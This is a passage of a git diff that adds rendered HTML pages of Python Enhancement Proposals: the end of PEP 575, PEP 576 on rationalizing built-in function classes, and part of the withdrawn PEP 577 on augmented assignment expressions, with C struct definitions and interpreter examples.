+    PyMethodDef *m_ml; /* Description of the C function to call */
+    PyObject    *m_self; /* Passed as 'self' arg to the C func, can be NULL */
+    PyObject    *m_module; /* The __module__ attribute, can be anything */
+    PyObject    *m_weakreflist; /* List of weak references */
+} PyCFunctionObject;
+
+struct PyMethodDef {
+    const char  *ml_name;   /* The name of the built-in function/method */
+    PyCFunction ml_meth;    /* The C function that implements it */
+    int         ml_flags;   /* Combination of METH_xxx flags, which mostly
+                               describe the args expected by the C func */
+    const char  *ml_doc;    /* The __doc__ attribute, or NULL */
+};
+
+
+

where PyCFunction is a C function pointer (there are various forms of this, the most basic +takes two arguments for self and *args).

+

This class is used both for functions and bound methods: +for a method, the m_self slot points to the object:

+
>>> dict(foo=42).get
+<built-in method get of dict object at 0x...>
+>>> dict(foo=42).get.__self__
+{'foo': 42}
+
+
+

In some cases, a function is considered a “method” of the module defining it:

+
>>> import os
+>>> os.kill
+<built-in function kill>
+>>> os.kill.__self__
+<module 'posix' (built-in)>
+
+
+
+
+

method_descriptor: built-in unbound methods

+

These are of type PyMethodDescr_Type +with structure PyMethodDescrObject:

+
typedef struct {
+    PyDescrObject d_common;
+    PyMethodDef *d_method;
+} PyMethodDescrObject;
+
+typedef struct {
+    PyObject_HEAD
+    PyTypeObject *d_type;
+    PyObject *d_name;
+    PyObject *d_qualname;
+} PyDescrObject;
+
+
+
+
+

function: Python functions

+

These are of type PyFunction_Type +with structure PyFunctionObject:

+
typedef struct {
+    PyObject_HEAD
+    PyObject *func_code;        /* A code object, the __code__ attribute */
+    PyObject *func_globals;     /* A dictionary (other mappings won't do) */
+    PyObject *func_defaults;    /* NULL or a tuple */
+    PyObject *func_kwdefaults;  /* NULL or a dict */
+    PyObject *func_closure;     /* NULL or a tuple of cell objects */
+    PyObject *func_doc;         /* The __doc__ attribute, can be anything */
+    PyObject *func_name;        /* The __name__ attribute, a string object */
+    PyObject *func_dict;        /* The __dict__ attribute, a dict or NULL */
+    PyObject *func_weakreflist; /* List of weak references */
+    PyObject *func_module;      /* The __module__ attribute, can be anything */
+    PyObject *func_annotations; /* Annotations, a dict or NULL */
+    PyObject *func_qualname;    /* The qualified name */
+
+    /* Invariant:
+     *     func_closure contains the bindings for func_code->co_freevars, so
+     *     PyTuple_Size(func_closure) == PyCode_GetNumFree(func_code)
+     *     (func_closure may be NULL if PyCode_GetNumFree(func_code) == 0).
+     */
+} PyFunctionObject;
+
+
+

In Python 3, there is no “unbound method” class: +an unbound method is just a plain function.

+
+
+

method: Python bound methods

+

These are of type PyMethod_Type +with structure PyMethodObject:

+
typedef struct {
+    PyObject_HEAD
+    PyObject *im_func;   /* The callable object implementing the method */
+    PyObject *im_self;   /* The instance it is bound to */
+    PyObject *im_weakreflist; /* List of weak references */
+} PyMethodObject;
+
+
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0575.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0576/index.html b/pep-0576/index.html new file mode 100644 index 00000000000..34ba36b9d9c --- /dev/null +++ b/pep-0576/index.html @@ -0,0 +1,296 @@ + + + + + + + + PEP 576 – Rationalize Built-in function classes | peps.python.org + + +
+
+


+ + +
+
+
+

PEP 576 – Rationalize Built-in function classes

+
+
Author:
+
Mark Shannon <mark at hotpy.org>
+
BDFL-Delegate:
+
Petr Viktorin
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
10-May-2018
+
Python-Version:
+
3.8
+
Post-History:
+
17-May-2018, +23-Jun-2018, +08-Jul-2018, +29-Mar-2019
+
+
+
+
+
+

Abstract

+

Expose the “FastcallKeywords” convention used internally by CPython to third-party code, and make the inspect module use duck-typing. +In combination this will allow third-party C extensions and tools like Cython to create objects that use the same calling conventions as built-in and Python functions, thus gaining performance parity with built-in functions like len or print.

+

A small improvement in the performance of existing code is expected.

+
+
+

Motivation

+

Currently third-party module authors face a dilemma when implementing +functions in C. Either they can use one of the pre-existing built-in function +or method classes or implement their own custom class in C. +The first choice causes them to lose the ability to access the internals of the callable object. +The second choice is an additional maintenance burden and, more importantly, +has a significant negative impact on performance.

+

This PEP aims to allow authors of third-party C modules, and tools like Cython, to utilize the faster calling convention used internally by CPython for built-in functions and methods, and to do so without a loss of capabilities relative to a function implemented in Python.

+
+

Introspection

+

The inspect module will fully support duck-typing when introspecting callables.

+

The inspect.Signature.from_callable() function computes the signature of a callable. If an object has a __signature__ +property, then inspect.Signature.from_callable() simply returns that. To further support duck-typing, if a callable has a __text_signature__ +then the __signature__ will be created from that.

+

This means that third-party built-in functions can implement __text_signature__ where that is sufficient, and the more expensive __signature__ where necessary.
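+
As a sketch of the duck-typing involved, today's inspect module already honours a __signature__ attribute on arbitrary callables (the class below is an illustrative stand-in for a C-implemented callable, not part of this PEP):

+
import inspect
+
+class ThirdPartyCallable:
+    def __call__(self, a, b=1):
+        pass
+
+    @property
+    def __signature__(self):
+        # The "more expensive" option: build a Signature object on demand.
+        return inspect.Signature([
+            inspect.Parameter("a", inspect.Parameter.POSITIONAL_OR_KEYWORD),
+            inspect.Parameter("b", inspect.Parameter.POSITIONAL_OR_KEYWORD,
+                              default=1),
+        ])
+
+print(inspect.signature(ThirdPartyCallable()))  # (a, b=1)
+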

+
+
+

Efficient calls to third-party callables

+

Currently the majority of calls are dispatched to functions and method_descriptors in custom code, using the “FastcallKeywords” internal calling convention. This PEP proposes that this calling convention be implemented via a C function pointer. Third-party callables that implement this binary interface will have the potential to be called as fast as a built-in function.

+
+

Continued prohibition of callable classes as base classes

+

Currently any attempt to use function, method or method_descriptor as a base class for a new class will fail with a TypeError. This behaviour is desirable as it prevents errors when a subclass overrides the __call__ method. If callables could be sub-classed then any call to a function or a method_descriptor would need an additional check that the __call__ method had not been overridden. By exposing an additional call mechanism, the potential for errors becomes greater. As a consequence, any third-party class implementing the additional call interface will not be usable as a base class.

+
+
+
+
+

New classes and changes to existing classes

+
+

Python visible changes

+
    +
  1. A new built-in class, builtin_function, will be added.
  2. +
  3. types.BuiltinFunctionType will refer to builtin_function not builtin_function_or_method.
  4. +
  5. Instances of the builtin_function class will retain the __module__ property of builtin_function_or_method and gain the func_module and func_globals properties. The func_module allows access to the module to which the function belongs. Note that this is different from the __module__ property which merely returns the name of the module. The func_globals property is equivalent to func_module.__dict__ and is provided to mimic the Python function property of the same name. (See the sketch after this list for the equivalent split on today's Python functions.)
  6. +
  7. When binding a method_descriptor instance to an instance of its owning class, a bound_method will be created instead of a builtin_function_or_method. This means that the method_descriptors now mimic the behaviour of Python functions more closely. In other words, [].append becomes a bound_method instead of a builtin_function_or_method.
  8. +
+
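+
For comparison, plain Python functions already expose the name/namespace split that func_module and func_globals are intended to mirror (a runnable sketch of existing behaviour, not of the new builtin_function class):

+
import sys
+
+def f():
+    pass
+
+print(f.__module__)                # '__main__': only the module *name*
+mod = sys.modules[f.__module__]
+print(f.__globals__ is vars(mod))  # True: the actual module namespace
+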
+
+

C API changes

+
    +
  1. A new function PyBuiltinFunction_New(PyMethodDef *ml, PyObject *module) is added to create built-in functions.
  2. +
  3. PyCFunction_NewEx() and PyCFunction_New() are deprecated and will return a PyBuiltinFunction if able, otherwise a builtin_function_or_method.
  4. +
+
+
+
+

Retaining backwards compatibility in the C API and ABI

+

The proposed changes are fully backwards and forwards compatible at both the API and ABI level.

+
+

Internal C changes

+

Two new flags will be allowed for the typeobject.tp_flags field. These are Py_TPFLAGS_EXTENDED_CALL and Py_TPFLAGS_FUNCTION_DESCRIPTOR.

+
+

Py_TPFLAGS_EXTENDED_CALL

+

For any built-in class that sets Py_TPFLAGS_EXTENDED_CALL, the C struct corresponding to this built-in class must begin with the struct PyExtendedCallable, which is defined as follows:

+
typedef PyObject *(*extended_call_ptr)(PyObject *callable, PyObject** args,
+                   int positional_argcount, PyTupleObject* kwnames);
+
+typedef struct {
+    PyObject_HEAD
+    extended_call_ptr ext_call;
+} PyExtendedCallable;
+
+
+

Any class that sets the Py_TPFLAGS_EXTENDED_CALL flag cannot be used as a base class, and a TypeError will be raised if any Python code tries to use it as a base class.

+
+
+

Py_TPFLAGS_FUNCTION_DESCRIPTOR

+

If this flag is set for a built-in class F, then instances of that class are expected to behave the same as a Python function when used as a class attribute. Specifically, this means that the value of c.m, where C.m is an instance of the built-in class F (and c is an instance of C), must be a bound method binding C.m and c. Without this flag, it would be impossible for custom callables to behave like Python functions and be as efficient as Python or built-in functions.
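+
A rough Python-level analogue of the binding behaviour this flag requests, written with the ordinary descriptor protocol (the FuncLike name is purely illustrative; the actual proposal is a C-level type flag, not a Python descriptor):

+
import types
+
+class FuncLike:
+    """A callable that binds like a function when accessed via a class."""
+    def __init__(self, fn):
+        self.fn = fn
+
+    def __call__(self, *args, **kwargs):
+        return self.fn(*args, **kwargs)
+
+    def __get__(self, obj, objtype=None):
+        if obj is None:
+            return self                     # C.m: the callable itself
+        return types.MethodType(self, obj)  # c.m: a method binding C.m and c
+
+class C:
+    m = FuncLike(lambda self: "bound call")
+
+print(C().m())  # "self" is supplied automatically, as for a Python function
+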

+
+
+

Changes to existing C structs

+

The function, method_descriptor and method classes will have their corresponding structs changed to +start with the PyExtendedCallable struct.

+
+
+
+

Third-party built-in classes using the new extended call interface

+

To enable call performance on a par with Python functions and built-in functions, third-party callables should set the Py_TPFLAGS_EXTENDED_CALL bit of tp_flags and ensure that the corresponding C struct starts with the PyExtendedCallable struct. Any built-in class that has the Py_TPFLAGS_EXTENDED_CALL bit set must also implement the tp_call function and make sure its behaviour is consistent with the ext_call function.

+
+

Performance implications of these changes

+

Adding a function pointer to each callable, rather than each class of callable, enables the choice of dispatching function (the code to shuffle arguments about and do error checking) to be made when the callable object is created rather than when it is called. This should reduce the number of instructions executed between the call-site in the interpreter and the execution of the callee.

+
+
+
+
+

Alternative Suggestions

+

PEP 580 is an alternative approach to solving the same problem as this PEP.

+
+
+

Reference implementation

+

A draft implementation can be found at https://github.com/markshannon/cpython/tree/pep-576-minimal

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0576.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0577/index.html b/pep-0577/index.html new file mode 100644 index 00000000000..9a0d7c98cbb --- /dev/null +++ b/pep-0577/index.html @@ -0,0 +1,921 @@ + + + + + + + + PEP 577 – Augmented Assignment Expressions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 577 – Augmented Assignment Expressions

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>
+
Status:
+
Withdrawn
+
Type:
+
Standards Track
+
Created:
+
14-May-2018
+
Python-Version:
+
3.8
+
Post-History:
+
22-May-2018
+
+
+
+
Table of Contents +
+
+

PEP Withdrawal

+

While working on this PEP, I realised that it didn’t really address what was +actually bothering me about PEP 572’s proposed scoping rules for previously +unreferenced assignment targets, and also had some significant undesirable +consequences (most notably, allowing >>= and <<= as inline augmented +assignment operators that meant something entirely different from the >= +and <= comparison operators).

+

I also realised that even without dedicated syntax of their own, PEP 572 +technically allows inline augmented assignments to be written using the +operator module:

+
from operator import iadd
+if (target := iadd(target, value)) < limit:
+    ...
+
+
+

The restriction to simple names as inline assignment targets means that the +target expression can always be repeated without side effects, and thus avoids +the ambiguity that would arise from allowing actual embedded augmented +assignments (it’s still a bad idea, since it would almost certainly be hard +for humans to read, this note is just about the theoretical limits of language +level expressiveness).

+

Accordingly, I withdrew this PEP without submitting it for pronouncement. At +the time I also started writing a replacement PEP that focused specifically on +the handling of assignment targets which hadn’t already been declared as local +variables in the current scope (for both regular block scopes, and for scoped +expressions), but that draft never even reached a stage where I liked it +better than the ultimately accepted proposal in PEP 572, so it was never +posted anywhere, nor assigned a PEP number.

+
+
+

Abstract

+

This is a proposal to allow augmented assignments such as x += 1 to be +used as expressions, not just statements.

+

As part of this, NAME := EXPR is proposed as an inline assignment expression +that uses the new augmented assignment scoping rules, rather than implicitly +defining a new local variable name the way that existing name binding +statements do. The question of allowing expression level local variable +declarations at function scope is deliberately separated from the question of +allowing expression level name bindings, and deferred to a later PEP.

+

This PEP is a direct competitor to PEP 572 (although it borrows heavily from that +PEP’s motivation, and even shares the proposed syntax for inline assignments). +See Relationship with PEP 572 for more details on the connections between +the two PEPs.

+

To improve the usability of the new expressions, a semantic split is proposed +between the handling of augmented assignments in regular block scopes (modules, +classes, and functions), and the handling of augmented assignments in scoped +expressions (lambda expressions, generator expressions, and comprehensions), +such that all inline assignments default to targeting the nearest containing +block scope.

+

A new compile time TargetNameError is added as a subclass of SyntaxError +to handle cases where it is deemed to be currently unclear which target is +expected to be rebound by an inline assignment, or else the target scope +for the inline assignment is considered invalid for another reason.

+
+
+

Syntax and semantics

+
+

Augmented assignment expressions

+

The language grammar would be adjusted to allow augmented assignments to +appear as expressions, where the result of the augmented assignment +expression is the same post-calculation reference as is being bound to the +given target.

+

For example:

+
>>> n = 0
+>>> n += 5
+5
+>>> n -= 2
+3
+>>> n *= 3
+9
+>>> n
+9
+
+
+

For mutable targets, this means the result is always just the original object:

+
>>> seq = []
+>>> seq_id = id(seq)
+>>> seq += range(3)
+[0, 1, 2]
+>>> seq_id == id(seq)
+True
+
+
+

Augmented assignments to attributes and container subscripts will be permitted, +with the result being the post-calculation reference being bound to the target, +just as it is for simple name targets:

+
def increment(self, step=1):
+    return self._value += step
+
+
+

In these cases, __getitem__ and __getattribute__ will not be called +after the assignment has already taken place (they will only be called as +needed to evaluate the in-place operation).
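+
Augmented assignment statements already behave this way today; a small tracing subclass (illustrative) makes the single-read/single-write pattern visible:

+
class Tracing(dict):
+    def __getitem__(self, key):
+        print("__getitem__", key)
+        return super().__getitem__(key)
+
+    def __setitem__(self, key, value):
+        print("__setitem__", key)
+        super().__setitem__(key, value)
+
+d = Tracing()
+d["n"] = 0   # __setitem__ n
+d["n"] += 1  # __getitem__ n, then __setitem__ n: one read, one write
+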

+
+
+

Adding an inline assignment operator

+

Given only the addition of augmented assignment expressions, it would be +possible to abuse a symbol like |= as a general purpose assignment +operator by defining a Target wrapper type that worked as follows:

+
>>> class Target:
+...     def __init__(self, value):
+...         self.value = value
+...     def __or__(self, other):
+...         return Target(other)
+...
+>>> x = Target(10)
+>>> x.value
+10
+>>> x |= 42
+<__main__.Target object at 0x7f608caa8048>
+>>> x.value
+42
+
+
+

This is similar to the way that storing a single reference in a list was long used as a workaround for the lack of a nonlocal keyword, and can still be used today (in combination with operator.setitem) to work around the lack of expression level assignments.
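+
A sketch of that workaround as it can be written today, using operator.setitem and a single-element list as the mutable cell:

+
from operator import setitem
+
+ns = [0]  # a single mutable cell standing in for a rebindable name
+data = [1, 2, 3]
+# setitem returns None, so pair it with a re-read to yield the new value
+partial_sums = [(setitem(ns, 0, ns[0] + value), ns[0])[1] for value in data]
+print(partial_sums)  # [1, 3, 6]
+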

+

Rather than requiring such workarounds, this PEP instead proposes that +PEP 572’s “NAME := EXPR” syntax be adopted as a new inline assignment +expression that uses the augmented assignment scoping rules described below.

+

This cleanly handles cases where only the new value is of interest, and the +previously bound value (if any) can just be discarded completely.

+

Note that for both simple names and complex assignment targets, the inline +assignment operator does not read the previous reference before assigning +the new one. However, when used at function scope (either directly or inside +a scoped expression), it does not implicitly define a new local variable, +and will instead raise TargetNameError (as described for augmented +assignments below).

+
+
+

Assignment operator precedence

+

To preserve the existing semantics of augmented assignment statements, inline assignment operators will be defined as being of lower precedence than all other operators, including the comma pseudo-operator. This ensures that when used as a top level expression the entire right hand side of the expression is still interpreted as the value to be processed (even when that value is a tuple without parentheses).

+

The difference this introduces relative to PEP 572 is that where +(n := first, second) sets n = first in PEP 572, in this PEP it would set +n = (first, second), and getting the first meaning would require an extra +set of parentheses (((n := first), second)).
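+
The PEP 572 side of that comparison can be checked in any Python 3.8+ interpreter:

+
>>> (n := 1, 2)    # PEP 572 semantics: ":=" binds more tightly than the comma
+(1, 2)
+>>> n
+1
+>>> (n := (1, 2))  # explicit parentheses are needed to capture the tuple
+(1, 2)
+>>> n
+(1, 2)
+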

+

PEP 572 quite reasonably notes that this results in ambiguity when assignment +expressions are used as function call arguments. This PEP resolves that concern +a different way by requiring that assignment expressions be parenthesised +when used as arguments to a function call (unless they’re the sole argument).

+

This is a more relaxed version of the restriction placed on generator +expressions (which always require parentheses, except when they’re the sole +argument to a function call).

+
+
+

Augmented assignment to names in block scopes

+

No target name binding changes are proposed for augmented assignments at module +or class scope (this also includes code executed using “exec” or “eval”). These +will continue to implicitly declare a new local variable as the binding target +as they do today, and (if necessary) will be able to resolve the name from an +outer scope before binding it locally.

+

At function scope, augmented assignments will be changed to require that there +be either a preceding name binding or variable declaration to explicitly +establish the target name as being local to the function, or else an explicit +global or nonlocal declaration. TargetNameError, a new +SyntaxError subclass, will be raised at compile time if no such binding or +declaration is present.

+

For example, the following code would compile and run as it does today:

+
x = 0
+x += 1 # Sets global "x" to 1
+
+class C:
+    x += 1 # Sets local "x" to 2, leaves global "x" alone
+
+def local_target():
+    x = 0
+    x += 1 # Sets local "x" to 1, leaves global "x" alone
+
+def global_target():
+    global x
+    x += 1 # Increments global "x" each time this runs
+
+def nonlocal_target():
+    x = 0
+    def g():
+        nonlocal x
+        x += 1 # Increments "x" in outer scope each time this runs
+        return x
+    return g
+
+
+

The following examples would all still compile and then raise an error at runtime as they do today:

+
n += 1 # Raises NameError at runtime
+
+class C:
+    n += 1 # Raises NameError at runtime
+
+def missing_global():
+    global n
+    n += 1 # Raises NameError at runtime
+
+def delayed_nonlocal_initialisation():
+    def f():
+        nonlocal n
+        n += 1
+    f() # Raises NameError at runtime
+    n = 0
+
+def skipped_conditional_initialisation():
+    if False:
+        n = 0
+    n += 1 # Raises UnboundLocalError at runtime
+
+def local_declaration_without_initial_assignment():
+    n: typing.Any
+    n += 1 # Raises UnboundLocalError at runtime
+
+
+

Whereas the following would raise a compile time DeprecationWarning +initially, and eventually change to report a compile time TargetNameError:

+
def missing_target():
+    x += 1 # Compile time TargetNameError due to ambiguous target scope
+           # Is there a missing initialisation of "x" here? Or a missing
+           # global or nonlocal declaration?
+
+
+

As a conservative implementation approach, the compile time function name +resolution change would be introduced as a DeprecationWarning in Python +3.8, and then converted to TargetNameError in Python 3.9. This avoids +potential problems in cases where an unused function would currently raise +UnboundLocalError if it was ever actually called, but the code is actually +unused - converting that latent runtime defect to a compile time error qualifies +as a backwards incompatible change that requires a deprecation period.

+

When augmented assignments are used as expressions in function scope (rather +than as standalone statements), there aren’t any backwards compatibility +concerns, so the compile time name binding checks would be enforced immediately +in Python 3.8.

+

Similarly, the new inline assignment expressions would always require explicit +predeclaration of their target scope when used as part of a function, at least +for Python 3.8. (See the design discussion section for notes on potentially +revisiting that restriction in the future).

+
+
+

Augmented assignment to names in scoped expressions

+

Scoped expressions is a new collective term being proposed for expressions that +introduce a new nested scope of execution, either as an intrinsic part of their +operation (lambda expressions, generator expressions), or else as a way of +hiding name binding operations from the containing scope (container +comprehensions).

+

Unlike regular functions, these scoped expressions can’t include explicit +global or nonlocal declarations to rebind names directly in an outer +scope.

+

Instead, their name binding semantics for augmented assignment expressions would +be defined as follows:

+
    +
  • augmented assignment targets used in scoped expressions are expected to either +be already bound in the containing block scope, or else have their scope +explicitly declared in the containing block scope. If no suitable name +binding or declaration can be found in that scope, then TargetNameError +will be raised at compile time (rather than creating a new binding within +the scoped expression).
  • +
  • if the containing block scope is a function scope, and the target name is explicitly declared as global or nonlocal, then it will use the same scope declaration in the body of the scoped expression
  • +
  • if the containing block scope is a function scope, and the target name is +a local variable in that function, then it will be implicitly declared as +nonlocal in the body of the scoped expression
  • +
  • if the containing block scope is a class scope, then TargetNameError will always be raised, with a dedicated message indicating that combining class scopes with augmented assignments in scoped expressions is not currently permitted.
  • +
  • if a name is declared as a formal parameter (lambda expressions), or as an +iteration variable (generator expressions, comprehensions), then that name +is considered local to that scoped expression, and attempting to use it as +the target of an augmented assignment operation in that scope, or any nested +scoped expression, will raise TargetNameError (this is a restriction that +could potentially be lifted later, but is being proposed for now to simplify +the initial set of compile time and runtime semantics that needs to be +covered in the language reference and handled by the compiler and interpreter)
  • +
+

For example, the following code would work as shown:

+
>>> global_target = 0
+>>> incr_global_target = lambda: global_target += 1
+>>> incr_global_target()
+1
+>>> incr_global_target()
+2
+>>> global_target
+2
+>>> def cumulative_sums(data, start=0):
+...    total = start
+...    yield from (total += value for value in data)
+...    return total
+...
+>>> print(list(cumulative_sums(range(5))))
+[0, 1, 3, 6, 10]
+
+
+

While the following examples would all raise TargetNameError:

+
class C:
+    cls_target = 0
+    incr_cls_target = lambda: cls_target += 1 # Error due to class scope
+
+def missing_target():
+    incr_x = lambda: x += 1 # Error due to missing target "x"
+
+def late_target():
+    incr_x = lambda: x += 1 # Error due to "x" being declared after use
+    x = 1
+
+lambda arg: arg += 1 # Error due to attempt to target formal parameter
+
+[x += 1 for x in data] # Error due to attempt to target iteration variable
+
+
+

As augmented assignments currently can’t appear inside scoped expressions, the +above compile time name resolution exceptions would be included as part of the +initial implementation rather than needing to be phased in as a potentially +backwards incompatible change.

+
+
+
+

Design discussion

+
+

Allowing complex assignment targets

+

The initial drafts of this PEP kept PEP 572’s restriction to single name targets +when augmented assignments were used as expressions, allowing attribute and +subscript targets solely for the statement form.

+

However, enforcing that required varying the permitted targets based on whether +or not the augmented assignment was a top level expression or not, as well as +explaining why n += 1, (n += 1), and self.n += 1 were all legal, +but (self.n += 1) was prohibited, so the proposal was simplified to allow +all existing augmented assignment targets for the expression form as well.

+

Since this PEP defines TARGET := EXPR as a variant on augmented assignment, that also gained support for attribute and subscript targets.

+
+
+

Augmented assignment or name binding only?

+

PEP 572 makes a reasonable case that the potential use cases for inline +augmented assignment are notably weaker than those for inline assignment in +general, so it’s acceptable to require that they be spelled as x := x + 1, +bypassing any in-place augmented assignment methods.

+

While this is at least arguably true for the builtin types (where potential +counterexamples would probably need to focus on set manipulation use cases +that the PEP author doesn’t personally have), it would also rule out more +memory intensive use cases like manipulation of NumPy arrays, where the data +copying involved in out-of-place operations can make them impractical as +alternatives to their in-place counterparts.

+

That said, this PEP mainly exists because the PEP author found the inline +assignment proposal much easier to grasp as “It’s like +=, only skipping +the addition step”, and also liked the way that that framing provides an +actual semantic difference between NAME = EXPR and NAME := EXPR at +function scope.

+

That difference in target scoping behaviour means that the NAME := EXPR +syntax would be expected to have two primary use cases:

+
    +
  • as a way of allowing assignments to be embedded as an expression in an if +or while statement, or as part of a scoped expression
  • +
  • as a way of requesting a compile time check that the target name be previously +declared or bound in the current function scope
  • +
+

At module or class scope, NAME = EXPR and NAME := EXPR would be +semantically equivalent due to the compiler’s lack of visibility into the set +of names that will be resolvable at runtime, but code linters and static +type checkers would be encouraged to enforce the same “declaration or assignment +required before use” behaviour for NAME := EXPR as the compiler would +enforce at function scope.

+
+
+

Postponing a decision on expression level target declarations

+

At least for Python 3.8, usage of inline assignments (whether augmented or not) +at function scope would always require a preceding name binding or scope +declaration to avoid getting TargetNameError, even when used outside a +scoped expression.

+

The intent behind this requirement is to clearly separate the following two +language design questions:

+
    +
  1. Can an expression rebind a name in the current scope?
  2. +
  3. Can an expression declare a new name in the current scope?
  4. +
+

For module global scopes, the answer to both of those questions is unequivocally +“Yes”, because it’s a language level guarantee that mutating the globals() +dict will immediately impact the runtime module scope, and global NAME +declarations inside a function can have the same effect (as can importing the +currently executing module and modifying its attributes).

+

For class scopes, the answer to both questions is also “Yes” in practice, +although less unequivocally so, since the semantics of locals() are +currently formally unspecified. However, if the current behaviour of locals() +at class scope is taken as normative (as PEP 558 proposes), then this is +essentially the same scenario as manipulating the module globals, just using +locals() instead.

+

For function scopes, however, the current answers to these two questions are +respectively “Yes” and “No”. Expression level rebinding of function locals is +already possible thanks to lexically nested scopes and explicit nonlocal NAME +expressions. While this PEP will likely make expression level rebinding more +common than it is today, it isn’t a fundamentally new concept for the language.

+

By contrast, declaring a new function local variable is currently a statement +level action, involving one of:

+
    +
  • an assignment statement (NAME = EXPR, OTHER_TARGET = NAME = EXPR, etc)
  • +
  • a variable declaration (NAME : EXPR)
  • +
  • a nested function definition
  • +
  • a nested class definition
  • +
  • a for loop
  • +
  • a with statement
  • +
  • an except clause (with limited scope of access)
  • +
+

The historical trend for the language has actually been to remove support for +expression level declarations of function local names, first with the +introduction of “fast locals” semantics (which made the introduction of names +via locals() unsupported for function scopes), and again with the hiding +of comprehension iteration variables in Python 3.0.

+

Now, it may be that in Python 3.9, we decide to revisit this question based on +our experience with expression level name binding in Python 3.8, and decide that +we really do want expression level function local variable declarations as well, +and that we want NAME := EXPR to be the way we spell that (rather than, +for example, spelling inline declarations more explicitly as +NAME := EXPR given NAME, which would permit them to carry type annotations, +and also permit them to declare new local variables in scoped expressions, +rather than having to pollute the namespace in their containing scope).

+

But the proposal in this PEP is that we explicitly give ourselves a full +release to decide how much we want that feature, and exactly where we find +its absence irritating. Python has survived happily without expression level +name bindings or declarations for decades, so we can afford to give ourselves +a couple of years to decide if we really want both of those, or if expression +level bindings are sufficient.

+
+
+

Ignoring scoped expressions when determining augmented assignment targets

+

When discussing possible binding semantics for PEP 572’s assignment expressions, +Tim Peters made a plausible case [1], [2], [3] for assignment expressions targeting +the containing block scope, essentially ignoring any intervening scoped +expressions.

+

This approach allows use cases like cumulative sums, or extracting the final +value from a generator expression to be written in a relatively straightforward +way:

+
total = 0
+partial_sums = [total := total + value for value in data]
+
+factor = 1
+while any(n % (factor := p) == 0 for p in small_primes):
+    n //= factor
+
+
+

Guido also expressed his approval for this general approach [4].

+

The proposal in this PEP differs from Tim’s original proposal in three main +areas:

+
    +
  • it applies the proposal to all augmented assignment operators, not just a +single new name binding operator
  • +
  • as far as is practical, it extends the augmented assignment requirement that +the name already be defined to the new name binding operator (raising +TargetNameError rather than implicitly declaring new local variables at +function scope)
  • +
  • it includes lambda expressions in the set of scopes that get ignored for +target name binding purposes, making this transparency to assignments common +to all of the scoped expressions rather than being specific to comprehensions +and generator expressions
  • +
+

With scoped expressions being ignored when calculating binding targets, it’s once again difficult to detect the scoping difference between the outermost iterable expressions in generator expressions and comprehensions (you have to mess about with either class scopes or attempting to rebind iteration variables to detect it), so there’s also no need to tinker with that.

+
+
+

Treating inline assignment as an augmented assignment variant

+

One of the challenges with PEP 572 is the fact that NAME = EXPR and +NAME := EXPR are entirely semantically equivalent at every scope. This +makes the two forms hard to teach, since there’s no inherent nudge towards +choosing one over the other at the statement level, so you end up having to +resort to “NAME = EXPR is preferred because it’s been around longer” +(and PEP 572 proposes to enforce that historical idiosyncrasy at the compiler +level).

+

That semantic equivalence is difficult to avoid at module and class scope while +still having if NAME := EXPR: and while NAME := EXPR: work sensibly, but +at function scope the compiler’s comprehensive view of all local names makes +it possible to require that the name be assigned or declared before use, +providing a reasonable incentive to continue to default to using the +NAME = EXPR form when possible, while also enabling the use of the +NAME := EXPR as a kind of simple compile time assertion (i.e. explicitly +indicating that the targeted name has already been bound or declared and hence +should already be known to the compiler).

+

If Guido were to declare that support for inline declarations was a hard +design requirement, then this PEP would be updated to propose that +EXPR given NAME also be introduced as a way to support inline name declarations +after arbitrary expressions (this would allow the inline name declarations to be +deferred until the end of a complex expression rather than needing to be +embedded in the middle of it, and PEP 8 would gain a recommendation encouraging +that style).

+
+
+

Disallowing augmented assignments in class level scoped expressions

+

While modern classes do define an implicit closure that’s visible to method +implementations (in order to make __class__ available for use in zero-arg +super() calls), there’s no way for user level code to explicitly add +additional names to that scope.

+

Meanwhile, attributes defined in a class body are ignored for the purpose of +defining a method’s lexical closure, which means adding them there wouldn’t +work at an implementation level.

+

Rather than trying to resolve that inherent ambiguity, this PEP simply +prohibits such usage, and requires that any affected logic be written somewhere +other than directly inline in the class body (e.g. in a separate helper +function).

+
+
+

Comparison operators vs assignment operators

+

The OP= construct as an expression currently indicates a comparison +operation:

+
x == y # Equals
+x >= y # Greater-than-or-equal-to
+x <= y # Less-than-or-equal-to
+
+
+

Both this PEP and PEP 572 propose adding at least one operator that’s somewhat +similar in appearance, but defines an assignment instead:

+
x := y # Becomes
+
+
+

This PEP then goes much further and allows all 13 augmented assignment symbols to be used as binary operators:

+
x +=  y # In-place add
+x -=  y # In-place minus
+x *=  y # In-place multiply
+x @=  y # In-place matrix multiply
+x /=  y # In-place division
+x //= y # In-place int division
+x %=  y # In-place mod
+x &=  y # In-place bitwise and
+x |=  y # In-place bitwise or
+x ^=  y # In-place bitwise xor
+x <<= y # In-place left shift
+x >>= y # In-place right shift
+x **= y # In-place power
+
+
+

Of those additional binary operators, the most questionable would be the +bitshift assignment operators, since they’re each only one doubled character +away from one of the inclusive ordered comparison operators.

+
+
+
+

Examples

+
+

Simplifying retry loops

+

There are currently a few different options for writing retry loops, including:

+
# Post-decrementing a counter
+remaining_attempts = MAX_ATTEMPTS
+while remaining_attempts:
+    remaining_attempts -= 1
+    try:
+        result = attempt_operation()
+    except Exception as exc:
+        continue # Failed, so try again
+    log.debug(f"Succeeded after {MAX_ATTEMPTS - remaining_attempts} attempts")
+    break # Success!
+else:
+    raise OperationFailed(f"Failed after {MAX_ATTEMPTS} attempts") from exc
+
+# Loop-and-a-half with a pre-incremented counter
+attempts = 0
+while True:
+    attempts += 1
+    if attempts > MAX_ATTEMPTS:
+        raise OperationFailed(f"Failed after {MAX_ATTEMPTS} attempts") from exc
+    try:
+        result = attempt_operation()
+    except Exception as exc:
+        continue # Failed, so try again
+    log.debug(f"Succeeded after {attempts} attempts")
+    break # Success!
+
+
+

